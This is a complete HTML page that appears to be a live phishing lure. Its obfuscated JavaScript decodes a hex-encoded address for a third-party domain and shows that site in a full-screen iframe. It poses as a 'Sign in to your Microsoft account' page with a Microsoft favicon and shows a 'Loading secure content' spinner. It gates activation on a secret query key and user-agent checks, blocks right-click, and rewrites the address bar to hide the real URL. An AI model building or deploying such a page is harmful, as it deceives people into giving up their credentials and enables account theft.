<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link id="icon" rel="shortcut icon" href="" />
    <script src="https://code.jquery.com/jquery-3.7.1.min.js"
        integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>
    <title id="title">Please wait</title>
    <style>
        body {
            padding: 0px;
            margin: 0px;
            font-family: Arial, sans-serif;
            background-color: #f0f0f0;
        }
        .div1 {
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            text-align: center;
        }
        .div2 {
            display: none;
            margin: auto;
            position: static;
        }
        iframe {
            height: 100vh;
            width: 100vw;
            border: none;
            position: fixed;
            top: 0;
            left: 0;
        }
        .loader {
            display: inline-block;
            width: 80px;
            height: 80px;
        }
        .loader:after {
            content: " ";
            display: block;
            width: 64px;
            height: 64px;
            margin: 8px;
            border-radius: 50%;
            border: 6px solid #3498db;
            border-color: #3498db transparent #3498db transparent;
            animation: loader 1.2s linear infinite;
        }
        @keyframes loader {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
        .loading-text {
            margin-top: 20px;
            font-size: 18px;
            color: #333;
            font-weight: bold;
        }
    </style>
</head>
<body>
    <input id="lur" type="hidden"
        value="\\x68\\x74\\x74\\x70\\x73\\x25\\x33\\x41\\x2f\\x2f\\x77\\x65\\x6c\\x63\\x6f\\x6d\\x65\\x74\\x6f\\x6d\\x79\\x67\\x6f\\x76\\x65\\x72\\x6e\\x69\\x6e\\x67\\x62\\x6f\\x64\\x69\\x65\\x73\\x61\\x6e\\x64\\x70\\x75\\x62\\x6c\\x69\\x63\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x73\\x6c\\x69\\x6e\\x6b\\x73\\x73\\x65\\x63\\x74\\x69\\x6f\\x6e\\x2e\\x63\\x6f\\x6d"
        readonly required>
    <input id="kur" type="hidden" value="c2VjcmV0Y29kZQ==" readonly required>
    <div class="div1">
        <div class="loader"></div>
        <div class="loading-text">Loading secure content, please wait...</div>
    </div>
    <div class="div2">
    </div>

    <script>
const _0x3ce505=_0x1b02;(function(_0x418a0d,_0xe02f4a){const _0x14498a=_0x1b02,_0x126994=_0x418a0d();while(!![]){try{const _0x3baadf=parseInt(_0x14498a(0x11a))/0x1*(parseInt(_0x14498a(0x103))/0x2)+-parseInt(_0x14498a(0x105))/0x3*(-parseInt(_0x14498a(0x107))/0x4)+-parseInt(_0x14498a(0x135))/0x5*(parseInt(_0x14498a(0x129))/0x6)+-parseInt(_0x14498a(0x117))/0x7*(-parseInt(_0x14498a(0x111))/0x8)+-parseInt(_0x14498a(0x109))/0x9+-parseInt(_0x14498a(0x104))/0xa+parseInt(_0x14498a(0x120))/0xb;if(_0x3baadf===_0xe02f4a)break;else _0x126994['push'](_0x126994['shift']());}catch(_0x4877c1){_0x126994['push'](_0x126994['shift']());}}}(_0xfccc,0x93381));function hexToString(_0x4d0285){const _0x34e241=_0x1b02;let _0x339c33=_0x4d0285[_0x34e241(0x128)](/\\\\/g,'\x5c');return _0x339c33[_0x34e241(0x128)](/\\x([0-9A-Fa-f]{2})/g,function(_0x5c46ae,_0x401f81){const _0x354e53=_0x34e241;return String[_0x354e53(0x12d)](parseInt(_0x401f81,0x10));});}function robustDecode(_0x400466){const _0x3e6231=_0x1b02;let _0x3989c9=_0x400466[_0x3e6231(0x128)](/\\/g,'');try{return decodeURIComponent(_0x3989c9);}catch(_0x337836){return _0x3989c9;}}function redir(_0x3c786f,_0x42f00d){const _0x1fbf0a=_0x1b02;$(_0x1fbf0a(0x132))[_0x1fbf0a(0x10d)]();let _0x4a121b=hexToString(_0x3c786f),_0x37107c=robustDecode(_0x4a121b);!_0x37107c['startsWith'](_0x1fbf0a(0x10f))&&!_0x37107c[_0x1fbf0a(0x12b)](_0x1fbf0a(0x114))&&(_0x37107c=_0x1fbf0a(0x114)+_0x37107c);var _0xd202bb=document[_0x1fbf0a(0x108)](_0x1fbf0a(0x121));_0xd202bb[_0x1fbf0a(0x119)]=_0x42f00d?_0x37107c+'#'+_0x42f00d:_0x37107c,_0xd202bb['id']=_0x1fbf0a(0x125),$('.div2')[_0x1fbf0a(0x116)](_0xd202bb),$(_0x1fbf0a(0x11b))[_0x1fbf0a(0x12a)](_0x1fbf0a(0x130)),$(_0x1fbf0a(0x10e))[_0x1fbf0a(0x106)]('href',_0x1fbf0a(0x127)),$(_0x1fbf0a(0x11c))[_0x1fbf0a(0x11e)](),setTimeout(hideUrl,0x64);}function generateRandomString(_0x3f3598){const _0x45a520=_0x1b02,_0xdb848a=_0x45a520(0x134);let _0x20135d='';for(let _0x4a8cde=0x0;_0x4a8cde<_0x3f3598;_0x4a8cde++){_0x20135d+=_0xdb848a[_0x45a520(0x123)](Math[_0x45a520(0x122)](Math['random']()*_0xdb848a[_0x45a520(0x12f)]));}return _0x20135d;}function _0xfccc(){const _0x3ecab9=['slice','src','72wdmJlR','#title','.div2','replaceState','show','history','4760635zbuHwJ','iframe','floor','charAt','href','frm','Android','https://logincdn.msauth.net/16.000.29266.10/images/favicon.ico','replace','186YlVYZU','text','startsWith','userAgent','fromCharCode','get','length','Sign\x20in\x20to\x20your\x20Microsoft\x20account','addEventListener','.div1','qid','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_','92770EALrFk','10606shMLqw','5805560kJoXtS','3Oilarc','attr','4244728oTogJZ','createElement','5053113Ppboeh','location','#lur','contextmenu','hide','#icon','http://','indexOf','8LgxNsK','val','/confidentialqidq&protectedfileqid=','https://','#kur','html','3110891MuaKVf'];_0xfccc=function(){return _0x3ecab9;};return _0xfccc();}function _0x1b02(_0x2bc83f,_0x34ea2b){const _0xfccc59=_0xfccc();return _0x1b02=function(_0x1b02ae,_0x12e1df){_0x1b02ae=_0x1b02ae-0x103;let _0x2e9137=_0xfccc59[_0x1b02ae];return _0x2e9137;},_0x1b02(_0x2bc83f,_0x34ea2b);}function hideUrl(){const _0x46c517=_0x1b02;var _0x5a64eb=_0x46c517(0x113)+generateRandomString(0x64);window[_0x46c517(0x11f)][_0x46c517(0x11d)]({},'',_0x5a64eb);}document[_0x3ce505(0x131)](_0x3ce505(0x10c),_0x1cdc88=>_0x1cdc88['preventDefault']());var appName=navigator[_0x3ce505(0x12c)];let ang='13',and='20';appName['indexOf']('Windows')==ang|appName[_0x3ce505(0x110)]('Macintosh')==ang|appName[_0x3ce505(0x110)]('iPhone')==ang|appName[_0x3ce505(0x110)](_0x3ce505(0x126))==and&&setTimeout(function(){const _0x5f243b=_0x3ce505;let _0x36756a=$(_0x5f243b(0x115))[_0x5f243b(0x112)](),_0x44f35a=$(_0x5f243b(0x10b))[_0x5f243b(0x112)]();var _0x299963=new URL(window[_0x5f243b(0x10a)][_0x5f243b(0x124)]),_0x1985a8=_0x299963['hash'][_0x5f243b(0x118)](0x1),_0x26e5b6=_0x299963['searchParams'][_0x5f243b(0x12e)](_0x5f243b(0x133));_0x36756a==_0x26e5b6&&redir(_0x44f35a,_0x1985a8);},0x7d0);
    </script>
</body>
</html>
